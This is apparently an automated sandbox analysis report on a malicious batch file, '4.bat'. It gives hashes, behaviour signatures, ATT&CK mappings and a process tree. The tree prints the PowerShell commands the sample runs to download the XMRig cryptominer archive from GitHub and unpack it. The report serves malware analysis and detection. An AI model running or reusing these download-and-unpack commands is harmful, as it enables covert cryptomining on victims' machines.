Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    4.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\4.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2912
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1920
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2592

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1I5SO8R825IUUQZ5FD03.temp
    Filesize

    7KB

    MD5

    2d3a139e223bcb732f23af8d0c94a6d6

    SHA1

    8dfac4b34b5341befcf7e40f30d4af21f68191be

    SHA256

    ca4446db8a8688717a02d36ae68cfdcc24cf6e435791d76883a4c2450c53e9f1

    SHA512

    3864fbd0595d35e1f894a32720c6f15772013478de9bfb59f76674b53ce81061f534d2a2df775d23793d17f198bf7c52318b4f9a8492155d2211873fab5ac4d5

  • memory/1920-4-0x000007FEF5C1E000-0x000007FEF5C1F000-memory.dmp
    Filesize

    4KB

  • memory/1920-5-0x000000001B650000-0x000000001B932000-memory.dmp
    Filesize

    2.9MB

  • memory/1920-7-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp
    Filesize

    9.6MB

  • memory/1920-6-0x0000000001E80000-0x0000000001E88000-memory.dmp
    Filesize

    32KB

  • memory/1920-8-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp
    Filesize

    9.6MB

  • memory/1920-9-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp
    Filesize

    9.6MB

  • memory/1920-10-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp
    Filesize

    9.6MB

  • memory/1920-11-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp
    Filesize

    9.6MB

  • memory/1920-12-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp
    Filesize

    9.6MB

  • memory/2592-19-0x0000000002870000-0x0000000002878000-memory.dmp
    Filesize

    32KB

  • memory/2592-18-0x000000001B580000-0x000000001B862000-memory.dmp
    Filesize

    2.9MB